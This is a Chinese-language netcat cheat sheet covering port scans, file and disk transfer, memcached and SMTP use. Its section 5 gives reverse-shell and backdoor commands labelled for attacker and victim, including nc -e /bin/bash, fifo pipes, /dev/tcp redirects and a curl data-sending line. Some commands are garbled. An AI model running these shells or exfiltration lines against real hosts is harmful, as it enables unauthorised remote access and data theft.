netcat(nc)
记录一下。
参数
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l port [-options] [hostname] [port]
-g<网关>:设置路由器跃程通信网关,最多设置8个;
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-n:直接使用ip地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程信息;-vv 显示执行过程中更详细的信息
-w<超时秒数>:设置等待连线的时间;
-z:使用0输入/输出模式,只在扫描通信端口时使用。
假设服务器A的IP:192.168.0.11
假设服务器B的IP:192.168.0.12
文章部分例子中使用的端口为 4403 ,实际使用根据使用者修改。
1.1、端口扫描
nc -z -v -n 192.168.0.11 21-25
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接,不进行数据交换
v 参数指使用冗余选项(译者注:即详细输出)
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名
1.2、连接开放端口21并且打印运行在这个端口上服务的banner信息。
nc -v 192.168.0.11 21
2、聊天服务,建立连接后两边机器输入的信息都能显示在另一台连接上的机器
服务器A(服务端)执行:nc -l 4403
服务器B(客户端)执行:nc 192.168.0.11 4403
3.1、文件传输(A传给B,相当于B从A下载文件)
服务器A(服务端)执行:nc -l 4403 < file.txt
服务器B(客户端)执行:nc -n 192.168.0.11 4403 > file.txt
3.2、传输server创建在B(客户端)上,A(服务端)接收文件(B传给A):
服务器A(服务端):nc -l 4403 > file.txt
服务器B(客户端):nc 192.168.0.11 4403 < file.txt
当需要将客户端子网中某台机器传输文件到外网上的某台服务器上时适用,相当于上传文件
3.3、目录传输(从A传输到B),归档-传输-下载-解压
服务器A(服务端):tar -cvf – dir_name | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | tar -xvf -
3.4、如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。
服务器A(服务端):tar -cvf – dir_name| bzip2 -z | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | bzip2 -d |tar -xvf -
3.4、备份档案
服务器A(服务端):tar czf - work|nc -l -c -p 1234
服务器B(客户端):nc 192.168.0.1 1234 >a.tgz
3.5、 加密你通过网络发送的数据,使用mcrypt工具解密数据。以下两个命令会提示需要密码,确保两端使用相同的密码
服务器A(服务端):nc localhost 4403 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
服务器B(客户端):mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 4403
3.6、流视频
服务器A(服务端):cat video.avi | nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 | mplayer -vo x11 -cache 3000 -
4、克隆一个设备
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。
服务器A(服务端):dd if=/dev/sda | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | dd of=/dev/sda
5.1、创建远程shell,假设本地netcat支持 -c -e 参数(默认 netcat)
服务器A(服务端):nc -l 4403 -e /bin/bash -i
服务器B(客户端):nc 192.168.0.11 4403
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
服务器A(服务端):
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 4403 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口4403上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
服务器B(客户端):
$nc -n 192.168.0.11 4403
5.2、反向shell(后门)
1)反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.11,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。
服务器A(服务端):nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 -e /bin/bash
2)受害者的机器(服务端) :
nc -l -p port -e cmd.exe // win2000
nc -l -p port -e /bin/sh // unix,linux
攻击者的机器(客户端):.
nc ip -p port // 连接受害者机器IP,然后得到一个shell。
3)不使用-e选项反弹shell
攻击方先执行(服务端):
nc -lnvp 4430
被攻击方再执行(客户端):(如果非root账户无法执行mknod,则使用mkfifo /tmp/backpipe也可以创建一个管道。)
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.0.11 4430 1>/tmp/backpipe
4)攻击者(服务端):
nc -vv -l -p
受害者(客户端):
nc -e cmd.exe 192.168.0.11 -p 4403
nc -e /bin/sh 192.168.0.11 -p 4403
5)攻击者(服务端):
nc -vv -l -p 4403
nc -vv -l -p 4404
受害者(客户端):
nc 192.168.0.11 4403 | cmd.exe | nc 192.168.0.11 4404
nc 192.168.0.11 4403 | /bin/sh | nc 192.168.0.11 4404
6)Bash反弹
攻击者(服务端,IP:192.168.0.11):
nc -lvvp 4403
受害者(客户端):
bash -c 'sh -i &>/dev/tcp/192.168.0.11/4403 0>&1'
或者
bash -i >& /dev/tcp/192.168.0.11/4403 0>&1
或者
a=bash -i >& /dev/tcp/192.168.0.11/4403 0>&1
;curl -d ${a} http://192.168.0.11/4403
6.1、指定源端口通讯,假设防火墙过滤除25端口外其它所有端口,则需要使用-p选项指定源端口。客户端开启25端口用于通讯,否则将使用随机端口。
服务器A(服务端):nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 -p 25
6.2、多ip时指定源地址通讯,假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。该命令将绑定地址192.168.0.13。
服务器A(服务端):nc -u -l 4403 < file.txt
服务器B(客户端):nc -u 192.168.0.11 4403 -s 192.168.0.13 > file.txt
7、用nc命令操作memcached
存储数据:printf "setkey 0 10 6rnresultrn” |nc 192.168.0.11 11211
获取数据:printf “get keyrn” |nc 192.168.0.11 11211
删除数据:printf “delete keyrn” |nc 192.168.0.11 11211
查看状态:printf "statsrn” |nc 192.168.0.11 11211
模拟top命令查看状态:watch “echo stats” |nc 192.168.0.11 11211
清空缓存:printf “flush_allrn” |nc 192.168.0.11 11211
8.1、在测试邮件服务器是否正常时,手动使用 SMTP 协议发送邮件
$nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: user@host.example.com
RCPT TO: user2@host.example.com
DATA
Body of email.
.
QUIT
EOF
8.2、模拟HTTP Headers,访问一个网站,输入后双回车获取响应内容
$nc www.215814.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
9、其他
建立从本地1234端口到www.test.com的80端口连接,5秒超时
nc -p 1234 -w 5 www.test.com 80
u为UDP连接
nc -u www.test.com 53
扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -z www.test.com 70-80
监听本地主机TCP80端口
nc -l -p 80
监听本地主机TCP80端口并将访问信息记录下来
nc -l -p 80 >>/log/listen.log
使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
nc -L -p 80
打开本地的7626端口进行监听,并反馈连接信息。
nc -l -v -p 7626
使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:/log.txt'中,如果把‘>' 改为‘>>'即可以追加日志
nc -L -p 80 > c:/log.txt
连到192.168.0.11的TCP80端口
nc -nvv 192.168.0.11 80
连接到192.168.0.11的80端口,并在其管道中发送'/test.txt'的内容(攻击程序)
nc -nvv 192.168.0.11 80 < /test.txt
端口数据抓包.
nc -vv -w 2 -o test.txt xfocus.Net 80 21-15
网友评论